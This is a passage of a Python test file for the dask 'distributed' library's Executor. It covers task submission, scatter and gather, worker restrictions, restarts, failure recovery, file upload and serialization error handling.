= e.gather([x, y], errors='skip') assert xx == 2 @gen_cluster() def test_gather_strict(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 2, 1) y = e.submit(div, 1, 0) with pytest.raises(ZeroDivisionError): result = yield e._gather([x, y]) [xx] = yield e._gather([x, y], errors='skip') assert xx == 2 yield e._shutdown() @gen_cluster() def test_get(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() result = yield e._get({'x': (inc, 1)}, 'x') assert result == 2 result = yield e._get({'x': (inc, 1)}, ['x']) assert result == [2] result = yield e._get({}, []) assert result == [] yield e._shutdown() def test_get_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: assert e.get({'x': (inc, 1)}, 'x') == 2 def test_submit_errors(loop): def f(a, b, c): pass e = Executor('127.0.0.1:8787', start=False, loop=loop) with pytest.raises(TypeError): e.submit(1, 2, 3) with pytest.raises(TypeError): e.map([1, 2, 3]) @gen_cluster() def test_wait(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) c = e.submit(inc, 2) done, not_done = yield _wait([a, b, c]) assert done == {a, b, c} assert not_done == set() assert a.status == b.status == 'finished' yield e._shutdown() @gen_cluster() def test__as_completed(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) c = e.submit(inc, 2) from distributed.compatibility import Queue queue = Queue() yield _as_completed([a, b, c], queue) assert queue.qsize() == 3 assert {queue.get(), queue.get(), queue.get()} == {a, b, c} result = yield _first_completed([a, b, c]) assert result in [a, b, c] yield e._shutdown() def test_as_completed(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(inc, 1) seq = as_completed([x, y, z]) assert isinstance(seq, Iterator) assert set(seq) == {x, y, z} def test_wait_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) y = e.submit(inc, 2) done, not_done = wait([x, y]) assert done == {x, y} assert not_done == set() assert x.status == y.status == 'finished' @gen_cluster() def test_garbage_collection(s, a, b): import gc e = Executor((s.ip, s.port), start=False) yield e._start() a = e.submit(inc, 1) b = e.submit(inc, 1) assert e.refcount[a.key] == 2 a.__del__() assert e.refcount[a.key] == 1 c = e.submit(inc, b) b.__del__() result = yield c._result() assert result == 3 bkey = b.key b.__del__() assert bkey not in e.futures yield e._shutdown() @gen_cluster() def test_garbage_collection_with_scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [a] = yield e._scatter([1]) assert a.key in e.futures assert a.status == 'finished' assert a.event.is_set() assert s.who_wants[a.key] == {e.id} assert e.refcount[a.key] == 1 a.__del__() assert e.refcount[a.key] == 0 start = time() while True: if a.key not in s.who_has: break else: assert time() < start + 3 yield gen.sleep(0.1) yield e._shutdown() @gen_cluster(timeout=1000) def test_recompute_released_key(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 100) result1 = yield x._result() xkey = x.key del x import gc; gc.collect() assert e.refcount[xkey] == 0 # 1 second batching needs a second action to trigger while xkey in s.who_has or xkey in a.data or xkey in b.data: yield gen.sleep(0.1) x = e.submit(inc, 100) assert x.key in e.futures result2 = yield x._result() assert result1 == result2 yield e._shutdown() def slowinc(x): from time import sleep sleep(0.02) return x + 1 @pytest.mark.parametrize(('func', 'n'), [(slowinc, 100), (inc, 1000)]) def test_stress_gc(loop, func, n): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(func, 1) for i in range(n): x = e.submit(func, x) assert x.result() == n + 2 @slow def test_long_tasks_dont_trigger_timeout(loop): @gen.coroutine def f(c, a, b): e = Executor((c.ip, c.port), start=False, loop=loop) yield e._start() from time import sleep x = e.submit(sleep, 3) yield x._result() yield e._shutdown() _test_cluster(f, loop) @gen_cluster() def test_missing_data_heals(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, x) z = e.submit(inc, y) yield _wait([x, y, z]) # Secretly delete y's key if y.key in a.data: del a.data[y.key] if y.key in b.data: del b.data[y.key] w = e.submit(add, y, z) result = yield w._result() assert result == 3 + 4 yield e._shutdown() @slow @gen_cluster() def test_missing_worker(s, a, b): bad = ('bad-host', 8788) s.ncores[bad] = 4 s.who_has['b'] = {bad} s.has_what[bad] = {'b'} e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'a': 1, 'b': (inc, 'a'), 'c': (inc, 'b')} result = yield e._get(dsk, 'c') assert result == 3 assert bad not in s.ncores yield e._shutdown() @gen_cluster() def test_gather_robust_to_missing_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y, z = e.map(inc, range(3)) yield _wait([x, y, z]) # everything computed for q in [x, y]: if q.key in a.data: del a.data[q.key] if q.key in b.data: del b.data[q.key] xx, yy, zz = yield e._gather([x, y, z]) assert (xx, yy, zz) == (1, 2, 3) yield e._shutdown() @gen_cluster() def test_gather_robust_to_nested_missing_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() w = e.submit(inc, 1) x = e.submit(inc, w) y = e.submit(inc, x) z = e.submit(inc, y) yield _wait([z]) for worker in [a, b]: for datum in [y, z]: if datum.key in worker.data: del worker.data[datum.key] result = yield e._gather([z]) assert result == [inc(inc(inc(inc(1))))] yield e._shutdown() @gen_cluster() def test_tokenize_on_futures(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 1) tok = tokenize(x) assert tokenize(x) == tokenize(x) assert tokenize(x) == tokenize(y) e.futures[x.key]['status'] = 'finished' assert tok == tokenize(y) yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_submit(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1, workers={a.ip}) y = e.submit(inc, x, workers={b.ip}) yield _wait([x, y]) assert s.restrictions[x.key] == {a.ip} assert x.key in a.data assert s.restrictions[y.key] == {b.ip} assert y.key in b.data yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_map(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(inc, range(5), workers={a.ip}) yield _wait(L) assert set(a.data) == {x.key for x in L} assert not b.data for x in L: assert s.restrictions[x.key] == {a.ip} L = e.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}]) yield _wait(L) assert s.restrictions[L[0].key] == {a.ip} assert s.restrictions[L[1].key] == {a.ip, b.ip} assert s.restrictions[L[2].key] == {b.ip} with pytest.raises(ValueError): e.map(inc, [10, 11, 12], workers=[{a.ip}]) yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_restrictions_get(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'x': 1, 'y': (inc, 'x'), 'z': (inc, 'y')} restrictions = {'y': {a.ip}, 'z': {b.ip}} result = yield e._get(dsk, ['y', 'z'], restrictions) assert result == [2, 3] assert 'y' in a.data assert 'z' in b.data yield e._shutdown() @gen_cluster() def dont_test_bad_restrictions_raise_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() z = e.submit(inc, 2, workers={'bad-address'}) try: yield z._result() assert False except ValueError as e: assert 'bad-address' in str(e) assert z.key in str(e) yield e._shutdown() def test_submit_after_failed_worker(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(10)) wait(L) a['proc'].terminate() total = e.submit(sum, L) assert total.result() == sum(map(inc, range(10))) def test_gather_after_failed_worker(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(10)) wait(L) a['proc'].terminate() result = e.gather(L) assert result == list(map(inc, range(10))) @slow def test_gather_then_submit_after_failed_workers(loop): with cluster(nworkers=4) as (s, [w, x, y, z]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: L = e.map(inc, range(20)) wait(L) w['proc'].terminate() total = e.submit(sum, L) wait([total]) (_, port) = first(e.scheduler.who_has[total.key]) for d in [x, y, z]: if d['port'] == port: d['proc'].terminate() result = e.gather([total]) assert result == [sum(map(inc, range(20)))] @gen_test() def test_errors_dont_block(): c = Center('127.0.0.1') c.listen(0) w = Worker(c.ip, c.port, ncores=1, ip='127.0.0.1') e = Executor((c.ip, c.port), start=False, loop=IOLoop.current()) yield w._start() yield e._start() L = [e.submit(inc, 1), e.submit(throws, 1), e.submit(inc, 2), e.submit(throws, 2)] start = time() while not (L[0].status == L[2].status == 'finished'): assert time() < start + 5 yield gen.sleep(0.01) result = yield e._gather([L[0], L[2]]) assert result == [2, 3] yield w._close() c.stop() @gen_cluster() def test_submit_quotes(s, a, b): def assert_list(x, z=[]): return isinstance(x, list) and isinstance(z, list) e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(assert_list, [1, 2, 3]) result = yield x._result() assert result x = e.submit(assert_list, [1, 2, 3], z=[4, 5, 6]) result = yield x._result() assert result x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(assert_list, [x, y]) result = yield z._result() assert result yield e._shutdown() @gen_cluster() def test_map_quotes(s, a, b): def assert_list(x, z=[]): return isinstance(x, list) and isinstance(z, list) e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(assert_list, [[1, 2, 3], [4]]) result = yield e._gather(L) assert all(result) L = e.map(assert_list, [[1, 2, 3], [4]], z=[10]) result = yield e._gather(L) assert all(result) L = e.map(assert_list, [[1, 2, 3], [4]], [[]] * 3) result = yield e._gather(L) assert all(result) yield e._shutdown() @gen_cluster() def test_two_consecutive_executors_share_results(s, a, b): from random import randint e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(randint, 0, 1000, pure=True) xx = yield x._result() f = Executor((s.ip, s.port), start=False) yield f._start() y = f.submit(randint, 0, 1000, pure=True) yy = yield y._result() assert xx == yy yield e._shutdown() yield f._shutdown() @gen_cluster() def test_submit_then_get_with_Future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(slowinc, 1) dsk = {'y': (inc, x)} result = yield e._get(dsk, 'y') assert result == 3 yield e._shutdown() @gen_cluster() def test_aliases(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) dsk = {'y': x} result = yield e._get(dsk, 'y') assert result == 2 yield e._shutdown() @gen_cluster() def test__scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() d = yield e._scatter({'y': 20}) assert isinstance(d['y'], Future) assert a.data.get('y') == 20 or b.data.get('y') == 20 assert (a.address in s.who_has['y'] or b.address in s.who_has['y']) assert s.who_has['y'] assert s.nbytes == {'y': sizeof(20)} yy = yield e._gather([d['y']]) assert yy == [20] [x] = yield e._scatter([10]) assert isinstance(x, Future) assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10 xx = yield e._gather([x]) assert s.who_has[x.key] assert (a.address in s.who_has[x.key] or b.address in s.who_has[x.key]) assert s.nbytes == {'y': sizeof(20), x.key: sizeof(10)} assert xx == [10] z = e.submit(add, x, d['y']) # submit works on Future result = yield z._result() assert result == 10 + 20 result = yield e._gather([z, x]) assert result == [30, 10] yield e._shutdown() @gen_cluster() def test_scatter_hash(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [a] = yield e._scatter([1]) [b] = yield e._scatter([1]) assert a.key == b.key yield e._shutdown() @gen_cluster() def test_get_releases_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [x] = yield e._get({'x': (inc, 1)}, ['x']) import gc; gc.collect() assert e.refcount['x'] == 0 yield e._shutdown() def test_global_executors(loop): assert not _global_executor[0] with pytest.raises(ValueError): default_executor() with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: assert _global_executor == [e] assert default_executor() is e with Executor(('127.0.0.1', s['port']), loop=loop) as f: assert _global_executor == [f] assert default_executor() is f assert default_executor(e) is e assert default_executor(f) is f assert not _global_executor[0] @gen_cluster() def test_exception_on_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(lambda: 1 / 0) y = e.submit(inc, x) with pytest.raises(ZeroDivisionError): out = yield y._result() z = e.submit(inc, y) with pytest.raises(ZeroDivisionError): out = yield z._result() yield e._shutdown() @gen_cluster() def test_nbytes(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() [x] = yield e._scatter([1]) assert s.nbytes == {x.key: sizeof(1)} y = e.submit(inc, x) yield y._result() assert s.nbytes == {x.key: sizeof(1), y.key: sizeof(2)} yield e._shutdown() @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_nbytes_determines_worker(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(identity, 1, workers=[a.address[0]]) y = e.submit(identity, tuple(range(100)), workers=[b.address[0]]) yield e._gather([x, y]) z = e.submit(lambda x, y: None, x, y) yield z._result() assert s.who_has[z.key] == {b.address} yield e._shutdown() @gen_cluster() def test_pragmatic_move_small_data_to_large_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() lists = e.map(lambda n: list(range(n)), [10] * 10, pure=False) sums = e.map(sum, lists) total = e.submit(sum, sums) def f(x, y): return None results = e.map(f, lists, [total] * 10) yield _wait([total]) yield _wait(results) for l, r in zip(lists, results): assert s.who_has[l.key] == s.who_has[r.key] yield e._shutdown() @gen_cluster() def test_get_with_non_list_key(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {('x', 0): (inc, 1), 5: (inc, 2)} x = yield e._get(dsk, ('x', 0)) y = yield e._get(dsk, 5) assert x == 2 assert y == 3 yield e._shutdown() @gen_cluster() def test_get_with_error(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() dsk = {'x': (div, 1, 0), 'y': (inc, 'x')} with pytest.raises(ZeroDivisionError): y = yield e._get(dsk, 'y') yield e._shutdown() def test_get_with_error_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: dsk = {'x': (div, 1, 0), 'y': (inc, 'x')} with pytest.raises(ZeroDivisionError): y = e.get(dsk, 'y') @gen_cluster() def test_directed_scatter(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() yield e._scatter([1, 2, 3], workers=[a.address]) assert len(a.data) == 3 assert not b.data yield e._shutdown() def test_directed_scatter_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: futures = e.scatter([1, 2, 3], workers=[('127.0.0.1', b['port'])]) has_what = sync(loop, e.scheduler.has_what) assert len(has_what[('127.0.0.1', b['port'])]) == 3 assert len(has_what[('127.0.0.1', a['port'])]) == 0 def test_iterator_scatter(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: aa = ee.scatter([1,2,3]) assert [1,2,3] == ee.gather(aa) g = (i for i in range(10)) futures = ee.scatter(g) assert isinstance(futures, Iterator) a = next(futures) assert ee.gather(a) == 0 def test_queue_scatter(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: from distributed.compatibility import Queue q = Queue() for d in range(10): q.put(d) futures = ee.scatter(q) assert isinstance(futures, Queue) a = futures.get() assert ee.gather(a) == 0 def test_queue_gather(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: from distributed.compatibility import Queue q = Queue() qin = list(range(10)) for d in qin: q.put(d) futures = ee.scatter(q) assert isinstance(futures, Queue) ff = ee.gather(futures) assert isinstance(ff, Queue) qout = [] for f in range(10): qout.append(ff.get()) assert qout == qin def test_iterator_gather(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as ee: i_in = list(range(10)) g = (d for d in i_in) futures = ee.scatter(g) assert isinstance(futures, Iterator) ff = ee.gather(futures) assert isinstance(ff, Iterator) i_out = list(ff) assert i_out == i_in i_in = ['a', 'b', 'c', StopIteration, 'd', 'e'] g = (d for d in i_in) futures = ee.scatter(g) ff = ee.gather(futures) i_out = list(ff) assert i_out == i_in @gen_cluster() def test_many_submits_spread_evenly(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L = [e.submit(inc, i) for i in range(10)] yield _wait(L) assert a.data and b.data yield e._shutdown() @gen_cluster() def test_traceback(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) tb = yield x._traceback() if sys.version_info[0] >= 3: assert any('x / y' in line for line in pluck(3, traceback.extract_tb(tb))) yield e._shutdown() def test_traceback_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(div, 1, 0) tb = x.traceback() if sys.version_info[0] >= 3: assert any('x / y' in line for line in concat(traceback.extract_tb(tb)) if isinstance(line, str)) y = e.submit(inc, x) tb2 = y.traceback() assert set(pluck(3, traceback.extract_tb(tb2))).issuperset( set(pluck(3, traceback.extract_tb(tb)))) z = e.submit(div, 1, 2) tb = z.traceback() assert tb is None @gen_test() def test_restart(): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') yield [a._start(), b._start()] e = Executor((c.ip, c.port), start=False, loop=IOLoop.current()) yield e._start() assert e.scheduler.ncores == {a.worker_address: 2, b.worker_address: 2} x = e.submit(inc, 1) y = e.submit(inc, x) yield y._result() cc = rpc(ip=c.ip, port=c.port) who_has = yield cc.who_has() try: assert e.scheduler.who_has == who_has assert set(e.scheduler.who_has) == {x.key, y.key} f = yield e._restart() assert f is e assert len(e.scheduler.stacks) == 2 assert len(e.scheduler.processing) == 2 who_has = yield cc.who_has() assert not who_has assert not e.scheduler.who_has assert x.cancelled() assert y.cancelled() finally: yield a._close() yield b._close() yield e._shutdown(fast=True) c.stop() def test_restart_sync_no_center(loop): with cluster(nanny=True) as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(inc, 1) e.restart() assert x.cancelled() y = e.submit(inc, 2) assert y.result() == 3 def test_restart_sync(loop): with cluster_center(nanny=True) as (c, [a, b]): with Executor(('127.0.0.1', c['port']), loop=loop) as e: assert len(e.scheduler.has_what) == 2 x = e.submit(div, 1, 2) x.result() assert e.scheduler.who_has e.restart() assert not e.scheduler.who_has assert x.cancelled() with pytest.raises(CancelledError): x.result() assert (set(e.scheduler.stacks) == set(e.scheduler.processing) == set(e.scheduler.ncores)) assert len(e.scheduler.stacks) == 2 y = e.submit(div, 1, 3) assert y.result() == 1 / 3 def test_restart_fast(loop): with cluster_center(nanny=True) as (c, [a, b]): with Executor(('127.0.0.1', c['port'])) as e: L = e.map(sleep, range(10)) start = time() e.restart() assert not e.scheduler.tasks assert time() - start < 5 assert all(x.status == 'cancelled' for x in L) x = e.submit(inc, 1) assert x.result() == 2 def test_fast_kill(loop): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') e = Executor((c.ip, c.port), start=False, loop=loop) @gen.coroutine def f(): yield a._start() yield b._start() while len(c.ncores) < 2: yield gen.sleep(0.01) yield e._start() L = e.map(sleep, range(10)) try: start = time() yield e._restart() assert time() - start < 5 assert all(x.status == 'cancelled' for x in L) x = e.submit(inc, 1) result = yield x._result() assert result == 2 finally: yield a._close() yield b._close() yield e._shutdown(fast=True) c.stop() loop.run_sync(f) @gen_cluster() def test_upload_file(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def g(): import myfile return myfile.f() with tmp_text('myfile.py', 'def f():\n return 123') as fn: yield e._upload_file(fn) sleep(1) # TODO: why is this necessary? x = e.submit(g, pure=False) result = yield x._result() assert result == 123 with tmp_text('myfile.py', 'def f():\n return 456') as fn: yield e._upload_file(fn) y = e.submit(g, pure=False) result = yield y._result() assert result == 456 yield e._shutdown() def test_upload_file_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: def g(): import myfile return myfile.x with tmp_text('myfile.py', 'x = 123') as fn: e.upload_file(fn) x = e.submit(g) assert x.result() == 123 @gen_cluster() def test_upload_file_exception(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() with tmp_text('myfile.py', 'syntax-error!') as fn: with pytest.raises(SyntaxError): yield e._upload_file(fn) yield e._shutdown() def test_upload_file_exception_sync(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: with tmp_text('myfile.py', 'syntax-error!') as fn: with pytest.raises(SyntaxError): e.upload_file(fn) @gen_cluster() def test_multiple_executors(s, a, b): a = Executor((s.ip, s.port), start=False) yield a._start() b = Executor((s.ip, s.port), start=False) yield b._start() x = a.submit(inc, 1) y = b.submit(inc, 2) assert x.executor is a assert y.executor is b xx = yield x._result() yy = yield y._result() assert xx == 2 assert yy == 3 z = a.submit(add, x, y) assert z.executor is a zz = yield z._result() assert zz == 5 yield a._shutdown() yield b._shutdown() def test_multiple_executors_restart(loop): from distributed import Nanny, rpc c = Center('127.0.0.1') c.listen(0) a = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') b = Nanny(c.ip, c.port, ncores=2, ip='127.0.0.1') @gen.coroutine def f(): yield a._start() yield b._start() while len(c.ncores) < 2: yield gen.sleep(0.01) try: e1 = Executor((c.ip, c.port), start=False, loop=loop) yield e1._start() e2 = Executor(e1.scheduler, start=False, loop=loop) yield e2._start() x = e1.submit(inc, 1) y = e2.submit(inc, 2) xx = yield x._result() yy = yield y._result() assert xx == 2 assert yy == 3 yield e1._restart() assert x.cancelled() assert y.cancelled() finally: yield a._close() yield b._close() yield e1._shutdown(fast=True) yield e2._shutdown(fast=True) c.stop() loop.run_sync(f) @gen_cluster() def test_async_compute(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() from dask.imperative import do, value x = value(1) y = do(inc)(x) z = do(dec)(x) [yy, zz, aa] = e.compute([y, z, 3], sync=False) assert isinstance(yy, Future) assert isinstance(zz, Future) assert aa == 3 result = yield e._gather([yy, zz]) assert result == [2, 0] assert isinstance(e.compute(y), Future) assert isinstance(e.compute([y]), (tuple, list)) yield e._shutdown() def test_sync_compute(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: from dask.imperative import do, value x = value(1) y = do(inc)(x) z = do(dec)(x) yy, zz = e.compute([y, z], sync=True) assert (yy, zz) == (2, 0) @gen_cluster() def test_remote_scheduler(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert isinstance(e.scheduler_stream, IOStream) assert s.streams x = e.submit(inc, 1) result = yield x._result() yield e._shutdown() def test_input_types(loop): @gen.coroutine def f(c, a, b): e1 = Executor((c.ip, c.port), start=False, loop=loop) yield e1._start() assert isinstance(e1.center, rpc) assert isinstance(e1.scheduler, Scheduler) s = Scheduler((c.ip, c.port)) yield s.sync_center() done = s.start(0) e2 = Executor(s, start=False, loop=loop) yield e2._start() assert isinstance(e2.center, rpc) assert isinstance(e2.scheduler, Scheduler) s.listen(8042) e3 = Executor(('127.0.0.1', s.port), start=False, loop=loop) yield e3._start() assert isinstance(e3.center, rpc) assert isinstance(e3.scheduler, rpc) s.stop() yield e1._shutdown() yield e2._shutdown() yield e3._shutdown() _test_cluster(f, loop) @gen_cluster() def test_remote_scatter_gather(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y, z = yield e._scatter([1, 2, 3]) assert x.key in a.data or x.key in b.data assert y.key in a.data or y.key in b.data assert z.key in a.data or z.key in b.data xx, yy, zz = yield e._gather([x, y, z]) assert (xx, yy, zz) == (1, 2, 3) yield e._shutdown() @gen_cluster(timeout=1000) def test_remote_submit_on_Future(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(lambda x: x + 1, 1) y = e.submit(lambda x: x + 1, x) result = yield y._result() assert result == 3 yield e._shutdown() def test_start_is_idempotent(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: e.start() e.start() e.start() x = e.submit(inc, 1) assert x.result() == 2 def test_executor_with_scheduler(loop): @gen.coroutine def f(s, a, b): assert s.ncores == {a.address: a.ncores, b.address: b.ncores} e = Executor(('127.0.0.1', s.port), start=False, loop=loop) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y) result = yield x._result() assert result == 1 + 1 a, b, c = yield e._scatter([1, 2, 3]) aa, bb, xx = yield e._gather([a, b, x]) assert (aa, bb, xx) == (1, 2, 2) result = yield e._get({'x': (inc, 1), 'y': (add, 'x', 10)}, 'y') assert result == 12 yield e._shutdown() _test_scheduler(f) @pytest.mark.skipif(sys.platform!='linux', reason="Need 127.0.0.2 to mean localhost") @gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)]) def test_allow_restrictions(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1, workers=a.ip) yield x._result() assert s.who_has[x.key] == {a.address} assert not s.loose_restrictions x = e.submit(inc, 2, workers=a.ip, allow_other_workers=True) yield x._result() assert s.who_has[x.key] == {a.address} assert x.key in s.loose_restrictions L = e.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True) yield _wait(L) assert all(s.who_has[f.key] == {a.address} for f in L) assert {f.key for f in L}.issubset(s.loose_restrictions) """ x = e.submit(inc, 14, workers='127.0.0.3') with ignoring(gen.TimeoutError): yield gen.with_timeout(timedelta(seconds=0.1), x._result()) assert False assert not s.who_has[x.key] assert x.key not in s.loose_restrictions """ x = e.submit(inc, 15, workers='127.0.0.3', allow_other_workers=True) yield x._result() assert s.who_has[x.key] assert x.key in s.loose_restrictions L = e.map(inc, range(15, 25), workers='127.0.0.3', allow_other_workers=True) yield _wait(L) assert all(s.who_has[f.key] for f in L) assert {f.key for f in L}.issubset(s.loose_restrictions) with pytest.raises(ValueError): e.submit(inc, 1, allow_other_workers=True) with pytest.raises(ValueError): e.map(inc, [1], allow_other_workers=True) with pytest.raises(TypeError): e.submit(inc, 20, workers='127.0.0.1', allow_other_workers='Hello!') with pytest.raises(TypeError): e.map(inc, [20], workers='127.0.0.1', allow_other_workers='Hello!') yield e._shutdown() @pytest.mark.skipif('True', reason='because') def test_bad_address(): try: Executor('123.123.123.123:1234', timeout=0.1) except (IOError, gen.TimeoutError) as e: assert "connect" in str(e).lower() try: Executor('127.0.0.1:1234', timeout=0.1) except (IOError, gen.TimeoutError) as e: assert "connect" in str(e).lower() @gen_cluster() def test_long_error(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def bad(x): raise ValueError('a' * 100000) x = e.submit(bad, 10) try: yield x._result() except ValueError as e: assert len(str(e)) < 100000 tb = yield x._traceback() assert all(len(line) < 100000 for line in concat(traceback.extract_tb(tb)) if isinstance(line, str)) @gen_cluster() def test_map_on_futures_with_kwargs(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() def f(x, y=10): return x + y futures = e.map(inc, range(10)) futures2 = e.map(f, futures, y=20) results = yield e._gather(futures2) assert results == [i + 1 + 20 for i in range(10)] future = e.submit(inc, 100) future2 = e.submit(f, future, y=200) result = yield future2._result() assert result == 100 + 1 + 200 yield e._shutdown() @gen_cluster(Worker=Nanny, timeout=60) def test_failed_worker_without_warning(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() L = e.map(inc, range(10)) yield _wait(L) ncores1 = s.ncores.copy() a.process.terminate() start = time() while not a.process.is_alive(): yield gen.sleep(0.01) assert time() - start < 10 yield gen.sleep(0.5) start = time() while len(s.ncores) < 2: yield gen.sleep(0.01) assert time() - start < 10 yield _wait(L) L2 = e.map(inc, range(10, 20)) yield _wait(L2) assert all(len(keys) > 0 for keys in s.has_what.values()) ncores2 = s.ncores.copy() yield e._restart() L = e.map(inc, range(10)) yield _wait(L) assert all(len(keys) > 0 for keys in s.has_what.values()) assert not (set(ncores2) & set(s.ncores)) # no overlap class BadlySerializedObject(object): def __getstate__(self): return 1 def __setstate__(self, state): raise TypeError("hello!") class FatallySerializedObject(object): def __getstate__(self): return 1 def __setstate__(self, state): print("This should never have been deserialized, closing") import sys sys.exit(0) @gen_cluster() def test_badly_serialized_input(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() o = BadlySerializedObject() future = e.submit(inc, o) futures = e.map(inc, range(10)) L = yield e._gather(futures) assert list(L) == list(map(inc, range(10))) yield e._shutdown() @pytest.mark.xfail def test_badly_serialized_input_stderr(capsys): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port'])) as e: o = BadlySerializedObject() future = e.submit(inc, o) start = time() while True: sleep(0.01) out, err = capsys.readouterr() if 'hello!' in err: break assert time() - start < 20 @gen_cluster() def test_repr(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert s.ip in str(e) assert str(s.port) in repr(e) yield e._shutdown() @gen_cluster() def test_forget_simple(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True) yield _wait([x, y, z]) assert not s.waiting_data[x.key] assert not 